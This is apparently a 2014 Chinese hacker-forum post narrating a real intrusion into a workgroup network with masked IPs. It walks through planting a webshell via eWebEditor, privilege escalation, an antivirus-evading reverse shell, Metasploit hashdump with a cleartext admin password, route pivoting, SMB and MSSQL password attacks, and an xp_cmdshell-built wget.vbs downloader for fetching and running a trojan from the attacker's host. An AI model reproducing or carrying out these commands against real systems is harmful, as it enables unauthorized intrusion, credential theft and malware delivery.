记一次在工作组的渗透 by wilson

2014-07-31 红客联盟

文章来自@wilson

一)getwebshell

Getshell—>直接ewebeditor对config.asp可编辑。

这个不是重点我粗略一讲 ewebeditor默认账户登入，可编辑config.asp 直接插马；

外围服务器:xxx.xxx.64.33

=======================================

二）提权

上传cmd.com就可以执行命令了 pr.exe提了

========================================

三)在工作组中的渗透

本地做了策略我登不上去3389 关了各种策略没有用估计是硬防了 = =人品啊

尼玛 netstat -ano 看见很多端口就是telnet 不上去。

后来发现整个段都是做了硬防的样子，扫不到一些重要端口。。。

算了不登上去了 = = 直接用msf搞吧用veil 生成一个免杀tcp反弹shell的payload[ veil免杀神器。。。]

——————————–

利用Msf进行渗透

连接上vpn，就有公网ip啦然后监听一个端口我喜欢1433 不知道为什么 = =||| 我老是监听端口时候外面连接不上，当我监听了1433 就可以连接上了。。。所以我常常选择这个端口。。。

—————————————–

进一步

——————————————

收集本机的密码

1.hashdump:

Administrator:sntcm33tao

2.扫描端口试试:

要加一个路由表，不加，你在外面扫扫不到什么东西的 = = 就是这样。。。。 route add xxx.xxx.64.0 255.255.255.0 session值

因为arp扫不了存活的主机【估计做了什么策略】

加载模块，设置测试，扫一些常见端口。。。

扫的数据被存在了数据库里面了！！我们可以通过hosts 和services命令来访问

3.开始漏洞测试

———————-445端口—————–

msf溢出还没打好耗时间。。偷个懒好了呵呵

– -||| 尝试SBM登入:加入自己在那个服务器上抓的密码:sntcm33tao

msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > set RHOSTS xxx.xxx.64.1-254 RHOST => xxx.xxx.64.1-254 msf auxiliary(smb_login) > set SMBPass sntcm33tao SMBPass =>sntcm33tao msf auxiliary(smb_login) > set SMBUser administrator SMBUser => administrator msf auxiliary(smb_login) > exploit

尼玛结果发现自己服务器密码没有用上 – – 唉伤心 – –

—————1433端口——————

用service -p 端口 -R导出结果到文件中

注意这个是自动加载到你现在使用对应的模块的！

进行myssql弱口令爆破尼玛走运了。。。有三个弱口令哈哈哈~~~

很好心里暗喜，估计着这个段的管理员认为做了硬防就出现空口令的这种失误了呵呵，这个突破点要好好利用

——————————————————————

好，接下来看看怎么利用这个漏洞三个方法。。

一)反弹一个shell

但是exploit出现了

[-] Exploit failed: EOFError EOFError 我擦失败了

xxx.xxx.64.24 是不是有杀软?? = =?? 尼玛。。。。。。。。 –

——————-

算了我先看看xxx.xxx.64.55可以么？

还是[-] Exploit failed: EOFError EOFErrorr我擦居然也是不行。。

————————

好吧，看看能不能用bind_tcp试试 set PAYLOAD windows/meterpreter/bind_tcp 不行 0 0 法克 = =|||

二) 好吧换思路 – -执行命令 use admin/mssql/mssql_exec 执行命令好了 – – set RHOST => xxx.xxx.64.24 msf auxiliary(mssql_exec) > set CMD cmd.exe /c net user CMD => cmd.exe /c net user msf auxiliary(mssql_exec) > exploit SQL Query: EXEC master..xp_cmdshell ‘cmd.exe /c net user’ output –

Administrator ASPNET Guest IUSR_XINLI IWAM_XINLI SQLDebugger SUPPORT_388945a0 }T?N??L??[?k ?FO?SuN*NbY*N???0

我擦可以撒 O(∩_∩)O哈哈哈~~~~~ 现在想着写一个wget.vbs 看看能不能下载马种马试试看。。。

echo iLocal=LCase(Wscript.Arguments(1)) >>c:\\wget.vbs echo iRemote=LCase(Wscript.Arguments(0)) >>c:\\wget.vbs echo wscript.echo “[!]GET “,iRemote >>c:\\wget.vbs echo set xPost=CreateObject(“Microsoft.XMLHTTP”) >>c:\\wget.vbs echo xPost.Open “GET”,iRemote,0 >>c:\\wget.vbs echo xPost.Send() >>c:\\wget.vbs echo set sGet=CreateObject(“ADODB.Stream”) >>c:\\wget.vbs echo sGet.Mode=3 >>c:\\wget.vbs echo sGet.Type=1 >>c:\\wget.vbs echo sGet.Open() >>c:\\wget.vbs echo sGet.Write xPost.ResponseBody >>c:\\wget.vbs echo sGet.SaveToFile iLocal,2 >>c:\\wget.vbs SQL Query: EXEC master..xp_cmdshell ‘type C:\wget.vbs’ output ————— iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) wscript.echo [!]GET ,iRemote set xPost=CreateObject(Microsoft.XMLHTTP) xPost.Open GET,iRemote,0 xPost.Send() set sGet=CreateObject(ADODB.Stream) sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile iLocal,2

尼玛累死哥了执行一下看看

cscript //nologo C:\\wget.vbs 你的马地址 C:\\windows\\马的名字.exe 我擦还是居然不可以尼玛啊。。是不是wget.vbs 给杀了我擦蛋疼啊 T_T –

———————————————————————–

三）Lcx.exe 转发好了

= =||| 我应该早点登xxx.xxx.64.24 的3389 用SQLTOOLS2.0.exe 登入xxx.xxx.64.24 和xxx.xxx.64.55